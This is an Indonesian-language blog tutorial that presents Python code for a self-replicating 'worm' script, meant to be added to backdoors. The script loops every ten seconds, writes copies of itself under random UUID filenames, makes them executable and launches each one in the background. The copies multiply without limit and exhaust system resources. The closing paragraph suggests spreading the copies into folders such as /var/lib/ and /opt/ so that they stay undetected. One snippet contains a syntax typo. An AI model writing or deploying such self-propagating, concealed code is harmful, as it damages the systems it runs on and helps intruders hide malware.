Python diakui atau tidak adalah salah satu scripting language yang paling banyak digunakan sebagai bahasa pemrograman tool hacking dan backdoor dalam dunia Computer Security. Dalam tutorial singkat ini, kita akan membuat script python yang bisa mereplika dirinya sendiri, seperti layaknya Worm.
Source code dibawah ini sangat simple dan bisa diimplementasikan ke hampir semua backdoor yang kalian temui atau tulis sendiri. Tinggal taruh di modul main atau terserah kalian.
Pertama, kita akan membaca isi dari script python yang sedang berjalan (self content reading) dengan contoh script:
[sourcecode]self_content = file(sys.argv[0]).read()[/sourcecode]
kemudian pada kondisi tertentu (dalam hal ini kita asumsikan saja true), beri jeda 10 detik, kemudian buat filename dengan uuid tertentu.
[sourcecode]namafile = = "%s.py" % uuid.uuid4()[/sourcecode]
Kemudian tulis konten dari script yang sudah kita baca ke file yang kita berinama tadi:
[sourcecode language=”python”]
# open and write to the copy
copy = open(namafile, "w")
copy.write(self_content)
copy.close()
[/sourcecode]
Jika membutuhkan akses supaya script baru tersebut executable, silakan ditambah script seperti ini:
[sourcecode language=”python”]
# make the copy executable and execute
os.chmod(namafile, 0755)
os.system("./%s &" % namafile)
[/sourcecode]
atau dalam versi utuhnya:
[sourcecode language=”python”]
#!/usr/bin/python
import os, sys, time, uuid
# get self code
self_content = file(sys.argv[0]).read()
while True:
# tunggu 10 detik
time.sleep(10)
# buat nama file, dengan UUID biar unik
namafile = "%s.py" % uuid.uuid4()
# write file
copy = open(namafile, "w")
copy.write(self_content)
copy.close()
# buat jadi executable
os.chmod(namafile, 0755)
os.system("./%s &" % namafile)
[/sourcecode]
Kalau dirasa masih kurang, bisa ditambahkan kondisi loop dari array folder path yang dikehendaki misal kita ingin menyebar ‘prototipe’ worm ini ke semua folder yang ditentukan misal /var/lib/, /opt/ dll lah yang penting tidak ketahuan…
Comments are closed.